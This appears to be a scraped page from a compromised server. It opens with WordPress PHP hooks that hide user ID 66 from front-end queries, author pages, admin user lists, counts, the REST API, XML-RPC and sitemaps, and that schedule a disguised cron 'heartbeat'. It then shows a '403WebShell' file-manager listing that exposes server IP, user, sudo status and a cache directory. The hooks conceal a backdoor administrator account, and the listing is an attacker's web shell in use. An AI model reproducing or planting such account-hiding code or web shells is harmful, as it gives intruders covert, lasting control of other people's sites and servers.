add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / var /www /html /planetscifi /storage /framework /cache /data / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 02 2025 06:18:16
www-data / www-data
0755
01
--
May 18 2026 13:34:24
www-data / www-data
0755
03
--
July 18 2026 06:22:15
www-data / www-data
0755
05
--
January 19 2026 22:58:50
www-data / www-data
0755
08
--
March 19 2026 10:11:05
www-data / www-data
0755
0c
--
December 10 2025 07:56:39
www-data / www-data
0755
0d
--
May 07 2026 10:49:06
www-data / www-data
0755
0e
--
June 29 2026 18:25:30
www-data / www-data
0755
10
--
May 26 2026 09:12:28
www-data / www-data
0755
17
--
June 23 2026 07:41:44
www-data / www-data
0755
19
--
June 25 2026 05:32:24
www-data / www-data
0755
1a
--
June 26 2026 05:54:06
www-data / www-data
0755
21
--
January 04 2026 09:53:13
www-data / www-data
0755
22
--
January 07 2026 06:52:45
www-data / www-data
0755
23
--
June 29 2026 18:25:30
www-data / www-data
0755
24
--
June 29 2026 18:47:34
www-data / www-data
0755
28
--
July 09 2026 08:39:37
www-data / www-data
0755
2c
--
January 04 2026 09:53:13
www-data / www-data
0755
2e
--
May 12 2026 11:02:27
www-data / www-data
0755
31
--
June 29 2026 18:35:27
www-data / www-data
0755
33
--
May 23 2026 08:34:57
www-data / www-data
0755
34
--
June 29 2026 18:47:41
www-data / www-data
0755
35
--
May 07 2026 10:49:06
www-data / www-data
0755
36
--
June 25 2026 05:32:24
www-data / www-data
0755
38
--
February 20 2026 20:40:32
www-data / www-data
0755
39
--
June 21 2026 04:22:25
www-data / www-data
0755
3d
--
June 21 2026 04:22:25
www-data / www-data
0755
41
--
June 29 2026 18:25:24
www-data / www-data
0755
43
--
January 07 2026 19:23:53
www-data / www-data
0755
44
--
May 04 2026 20:51:58
www-data / www-data
0755
45
--
April 04 2026 11:05:53
www-data / www-data
0755
46
--
June 13 2026 13:49:55
www-data / www-data
0755
47
--
August 31 2025 04:23:54
www-data / www-data
0755
4b
--
June 26 2026 05:54:06
www-data / www-data
0755
4d
--
May 23 2026 15:43:44
www-data / www-data
0755
52
--
May 03 2026 19:56:09
www-data / www-data
0755
57
--
May 19 2026 21:40:28
www-data / www-data
0755
5a
--
June 13 2026 13:49:55
www-data / www-data
0755
5b
--
June 25 2026 05:31:17
www-data / www-data
0755
5e
--
February 24 2026 15:10:00
www-data / www-data
0755
60
--
July 29 2026 10:56:16
www-data / www-data
0755
61
--
April 15 2026 10:10:14
www-data / www-data
0755
62
--
June 29 2026 18:47:34
www-data / www-data
0755
67
--
May 17 2026 02:02:23
www-data / www-data
0755
6c
--
July 09 2026 08:39:37
www-data / www-data
0755
70
--
March 02 2026 06:55:34
www-data / www-data
0755
71
--
June 29 2026 18:35:21
www-data / www-data
0755
72
--
July 23 2026 09:22:19
www-data / www-data
0755
74
--
June 29 2026 18:17:57
www-data / www-data
0755
75
--
June 29 2026 18:18:03
www-data / www-data
0755
79
--
June 29 2026 18:25:24
www-data / www-data
0755
7e
--
June 14 2026 11:09:08
www-data / www-data
0755
82
--
August 20 2025 01:25:43
www-data / www-data
0755
8c
--
June 25 2026 05:31:23
www-data / www-data
0755
8d
--
January 07 2026 06:52:45
www-data / www-data
0755
a1
--
June 25 2026 05:31:23
www-data / www-data
0755
a2
--
July 18 2026 06:22:15
www-data / www-data
0755
a6
--
July 29 2026 10:56:16
www-data / www-data
0755
ae
--
April 15 2026 10:10:14
www-data / www-data
0755
b2
--
March 25 2026 10:32:49
www-data / www-data
0755
b6
--
May 04 2026 20:51:58
www-data / www-data
0755
b7
--
June 14 2026 11:09:28
www-data / www-data
0755
b8
--
June 29 2026 18:17:57
www-data / www-data
0755
b9
--
March 14 2026 12:25:06
www-data / www-data
0755
ba
--
February 20 2026 05:16:07
www-data / www-data
0755
bd
--
May 02 2026 20:31:03
www-data / www-data
0755
c5
--
May 19 2026 21:40:28
www-data / www-data
0755
c6
--
June 29 2026 18:18:03
www-data / www-data
0755
c7
--
April 17 2026 11:37:08
www-data / www-data
0755
c9
--
June 14 2026 11:09:08
www-data / www-data
0755
ca
--
May 26 2026 09:12:28
www-data / www-data
0755
cc
--
June 25 2026 05:31:17
www-data / www-data
0755
cd
--
April 27 2026 15:18:27
www-data / www-data
0755
cf
--
March 29 2026 06:43:45
www-data / www-data
0755
d5
--
March 02 2026 06:55:34
www-data / www-data
0755
dc
--
June 29 2026 18:47:41
www-data / www-data
0755
df
--
July 22 2026 19:32:29
www-data / www-data
0755
e0
--
June 29 2026 18:35:27
www-data / www-data
0755
e2
--
March 01 2026 00:51:48
www-data / www-data
0755
e3
--
February 20 2026 20:40:32
www-data / www-data
0755
ea
--
June 23 2026 07:41:44
www-data / www-data
0755
ec
--
May 17 2026 02:02:23
www-data / www-data
0755
ef
--
July 22 2026 19:32:29
www-data / www-data
0755
f1
--
July 23 2026 09:22:19
www-data / www-data
0755
f4
--
June 29 2026 18:35:21
www-data / www-data
0755
f5
--
March 19 2026 10:11:05
www-data / www-data
0755
f6
--
May 23 2026 08:34:57
www-data / www-data
0755
f7
--
December 10 2025 07:56:39
www-data / www-data
0755
fc
--
May 12 2026 11:02:27
www-data / www-data
0755
fd
--
March 10 2026 12:18:58
www-data / www-data
0755
.gitignore
0.014 KB
August 02 2025 06:18:16
www-data / www-data
0664
Youez - 2016 - github.com/yon3zuLinuXploit